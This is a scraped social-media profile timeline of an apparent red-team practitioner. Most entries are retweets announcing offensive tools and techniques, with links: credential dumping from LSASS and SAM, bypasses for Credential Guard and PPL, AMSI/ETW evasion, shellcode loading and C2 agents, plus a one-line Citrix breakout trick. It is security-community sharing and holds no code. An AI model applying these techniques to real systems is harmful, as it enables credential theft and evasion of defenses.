Joined December 2011
- Tweets 1,072
- Following 361
- Followers 87
- Likes 1,895
2 Photos and videos
Marcus H. | Archiba π±π°/πΈπͺ retweeted
May 21
Wrote a BOF that is able to execute .NET assemblies in-memory via module stomping so ETW / AMSI are seeing a legitimate GAC assembly instead - github.com/nettitude/CLR-STOβ¦
1
61
183
13,357
Marcus H. | Archiba π±π°/πΈπͺ retweeted
Apr 15
Made a quick BOF to exploit the currently unpatched BlueHammer vulnerability to dump SAM hashes from a low integrity context.
github.com/incursi0n/BlueSAM
2
87
296
11,750
Marcus H. | Archiba π±π°/πΈπͺ retweeted
Apr 10
Releasing GodPotatoBOF: Cobalt Strike BOF used to perform privilege escalation by exploiting the SeImpersonate privilege. OPSEC safe alternative to the .NET version. Based on the original GodPotato PoC by BeichenDream.
github.com/incursi0n/GodPotaβ¦
1
88
317
17,780
Marcus H. | Archiba π±π°/πΈπͺ retweeted
Mar 24
Releasing KslKatz. Combining KslDump and GhostKatz to dump LSASS using no-fix KslD.sys memory read to bypass PPL. Extracts MSV1_0 NT hashes and WDigest cleartext passwords (if enabled) from LSASS using a Microsoft-signed driver.
github.com/S1lkys/KslKatz
5
112
341
18,964
Marcus H. | Archiba π±π°/πΈπͺ retweeted
Feb 12
Huginn Project:
Project to generate COFF-format shellcode with API for :
- Indirect syscall API
- Stack Spoofing
- Proxied LoadLibraryA calls
Great for UDRLs, stage0 and OPSEC-conscious shellcode.
github.com/NtDallas/Huginn
46
150
7,416
Marcus H. | Archiba π±π°/πΈπͺ retweeted
Jan 16
WSL2 is a powerful attacker hideout because it runs as a separate Hyper-V VM, and defenders rarely monitor it.
Daniel Mayer explains how attackers pivot into WSL2 and what it took to build tooling that works across WSL2 versions.
Read more β€΅οΈ ghst.ly/45fPUma
9
172
725
104,071
Marcus H. | Archiba π±π°/πΈπͺ retweeted
13 Sep 2025
Modular PIC C2 Agents (reprise) rastamouse.me/modular-pic-c2β¦
1
4
2,124
Marcus H. | Archiba π±π°/πΈπͺ retweeted
2 Sep 2025
You want to load your shellcode in .NET without calling VirtualProtect? Use RuntimeHelpers.PrepareMethod to create a predictable RWX memory region for you. This method also doesn't require a delegate function pointer, since you override a .NET method.
github.com/Mr-Un1k0d3r/Dotneβ¦
2
94
331
21,879
Marcus H. | Archiba π±π°/πΈπͺ retweeted
3 Sep 2025
Dropped a follow up blog for the talk I did at fwd:cloudsec earlier in the year. Hopefully this makes it easier for people to follow at their own pace about the SharePoint pre-authentication "feature"/issue and orgs can decide to turn it off or not labs.reversec.com/posts/2025β¦
1
9
21
1,323
Marcus H. | Archiba π±π°/πΈπͺ retweeted
4 Sep 2025
Best Citrix Breakout ever. You can only download .ica files that provide access to certain local applications but breakout out of these applications is not possible? Just modify the .ica file before starting it and remove The InitialProgram= value -> Full Citrix Session! π€
10
84
385
33,813
Marcus H. | Archiba π±π°/πΈπͺ retweeted
15 May 2025
5
73
245
13,988
Marcus H. | Archiba π±π°/πΈπͺ retweeted
15 May 2025
16
127
298
37,091
Marcus H. | Archiba π±π°/πΈπͺ retweeted
18 Apr 2025
BOF is out now, enjoy! πΈ
github.com/iilegacyyii/DataIβ¦
6
61
189
21,047
Marcus H. | Archiba π±π°/πΈπͺ retweeted
8 Feb 2025
πͺOpen-sourcing πStringReaper BOF!
I've had great success in engagements carving credentials out of remote process memory with this BOF
github.com/boku7/StringReapeβ¦
7
91
295
22,585
Marcus H. | Archiba π±π°/πΈπͺ retweeted
23 Jan 2025
I created a hypervisor-based emulator for Windows x64 binaries. This project uses Windows Hypervisor Platform to build a virtualized user-mode environment, allowing syscalls and memory accesses to be logged or intercepted. elastic.co/security-labs/winβ¦
Project:
github.com/x86matthew/WinVisβ¦
29
345
1,281
112,822
Wrote a short blog post on:
- ETW Threat Intelligence generated by SetThreadContext (hardware breakpoints)
- Kernel debugging and reversing
- Setting HWBPs in a more "stealthy" manner (not the same ETW TI events generated - no detections)
Check it out praetorian.com/blog/etw-threβ¦
8
76
249
17,308
Marcus H. | Archiba π±π°/πΈπͺ retweeted
16 Jan 2025
A few months ago, Microsoft released a critical patch for CVE-2024-43468, an unauthenticated SQL injection vulnerability in SCCM/ConfigMgr leading to remote code execution, discovered by @kalimer0x00.
synacktiv.com/advisories/micβ¦
1
64
170
11,422
Marcus H. | Archiba π±π°/πΈπͺ retweeted
7 Jan 2025
Achievement unlocked, my first blog with SoecterOps π€ This post looks at ADFS OAuth2 support, Device Registration, Enterprise PRT, and a brain dump of things that I didnβt want to leave sat on Notion. posts.specterops.io/adfs-livβ¦
21
115
347
40,121
Marcus H. | Archiba π±π°/πΈπͺ retweeted
19 Dec 2024
For the next installment in his malware blog series, Principal Security Consultant @_snus walks us through using shared memory sections to inject and execute code in a remote process. Read it now! hubs.la/Q030brbz0
2
35
109
15,795
Marcus H. | Archiba π±π°/πΈπͺ retweeted
3 Dec 2024
Today I made public NativeBypassCredGuard, a tool to bypass Credential Guard by patching WDigest.dll using only NTAPI functions: github.com/ricardojoserf/Nat⦠#redteam #blueteam #offsec
84
181
10,845